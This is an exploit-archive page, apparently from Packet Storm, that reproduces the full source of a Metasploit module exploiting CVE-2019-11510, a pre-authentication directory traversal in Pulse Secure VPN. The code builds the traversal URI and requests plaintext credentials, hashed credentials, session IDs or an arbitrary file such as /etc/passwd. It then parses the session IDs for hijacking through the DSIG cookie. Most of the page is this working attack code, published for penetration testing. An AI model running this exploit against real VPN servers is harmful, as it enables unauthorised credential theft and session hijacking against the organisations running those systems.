exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pulse Secure VPN Arbitrary File Disclosure

Pulse Secure VPN Arbitrary File Disclosure
Posted Aug 31, 2024
Authored by Orange Tsai, wvu, Alyssa Herrera, Justin Wagner, Meh Chang | Site metasploit.com

This Metasploit module exploits a pre-auth directory traversal in the Pulse Secure VPN server to dump an arbitrary file. Dumped files are stored in loot. If the "Automatic" action is set, plaintext and hashed credentials, as well as session IDs, will be dumped. Valid sessions can be hijacked by setting the "DSIG" browser cookie to a valid session ID. For the "Manual" action, please specify a file to dump via the "FILE" option. /etc/passwd will be dumped by default. If the "PRINT" option is set, file contents will be printed to the screen, with any unprintable characters replaced by a period. Please see related module exploit/linux/http/pulse_secure_cmd_exec for a post-auth exploit that can leverage the results from this module.

tags | exploit, web, arbitrary
systems | linux
advisories | CVE-2019-11510
SHA-256 | 9434228fa1dc2af2393abd6886ea6161415b95086765f63406754e8064f448e0

Pulse Secure VPN Arbitrary File Disclosure

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',
'Description' => %q{
This module exploits a pre-auth directory traversal in the Pulse Secure
VPN server to dump an arbitrary file. Dumped files are stored in loot.

If the "Automatic" action is set, plaintext and hashed credentials, as
well as session IDs, will be dumped. Valid sessions can be hijacked by
setting the "DSIG" browser cookie to a valid session ID.

For the "Manual" action, please specify a file to dump via the "FILE"
option. /etc/passwd will be dumped by default. If the "PRINT" option is
set, file contents will be printed to the screen, with any unprintable
characters replaced by a period.

Please see related module exploit/linux/http/pulse_secure_cmd_exec for
a post-auth exploit that can leverage the results from this module.
},
'Author' => [
'Orange Tsai', # Discovery (@orange_8361)
'Meh Chang', # Discovery (@mehqq_)
'Alyssa Herrera', # PoC (@Alyssa_Herrera_)
'Justin Wagner', # Module (@0xDezzy)
'wvu' # Module
],
'References' => [
['CVE', '2019-11510'],
['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],
['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],
['URL', 'https://hackerone.com/reports/591295']
],
'DisclosureDate' => '2019-04-24', # Public disclosure
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Dump creds and sessions'],
['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'HttpClientTimeout' => 5 # This seems sane
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [],
'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']
}
))

register_options([
OptString.new(
'FILE',
[
true,
'File to dump (manual mode only)',
'/etc/passwd'
]
),
OptBool.new(
'PRINT',
[
false,
'Print file contents (manual mode only)',
true
]
)
])
end

def the_chosen_one
return datastore['FILE'], 'User-chosen file'
end

def run
files =
case action.name
when 'Automatic'
print_status('Running in automatic mode')

# Order by most sensitive first
[
plaintext_creds,
session_ids,
hashed_creds
]
when 'Manual'
print_status('Running in manual mode')

# /etc/passwd by default
[the_chosen_one]
end

files.each do |path, info|
print_status("Dumping #{path}")

res = send_request_cgi(
'method' => 'GET',
'uri' => dir_traversal(path),
'partial' => true # Allow partial response due to timeout
)

unless res
fail_with(Failure::Unreachable, "Could not dump #{path}")
end

handle_response(res, path, info)
end
end

def handle_response(res, path, info)
case res.code
when 200
case action.name
when 'Automatic'
# TODO: Parse plaintext and hashed creds
if path == session_ids.first
print_status('Parsing session IDs...')

parse_sids(res.body).each do |sid|
print_good("Session ID found: #{sid}")
end
end
when 'Manual'
printable = res.body.gsub(/[^[:print:][:space:]]/, '.')

print_line(printable) if datastore['PRINT']
end

print_good(store_loot(
self.name, # ltype
'application/octet-stream', # ctype
rhost, # host
res.body, # data
path, # filename
info # info
))
when 302
fail_with(Failure::NotVulnerable, "Redirected to #{res.redirection}")
when 400
print_error("Invalid path #{path}")
when 404
print_error("#{path} not found")
else
print_error("I don't know what a #{res.code} code is")
end
end

def dir_traversal(path)
normalize_uri(
'/dana-na/../dana/html5acc/guacamole/../../../../../..',
"#{path}?/dana/html5acc/guacamole/" # Bypass query/vars_get
)
end

def parse_sids(body)
body.to_s.scan(/randomVal([[:xdigit:]]+)/).flatten.reverse
end

def plaintext_creds
return '/data/runtime/mtmp/lmdb/dataa/data.mdb', 'Plaintext credentials'
end

def session_ids
return '/data/runtime/mtmp/lmdb/randomVal/data.mdb', 'Session IDs'
end

def hashed_creds
return '/data/runtime/mtmp/system', 'Hashed credentials'
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close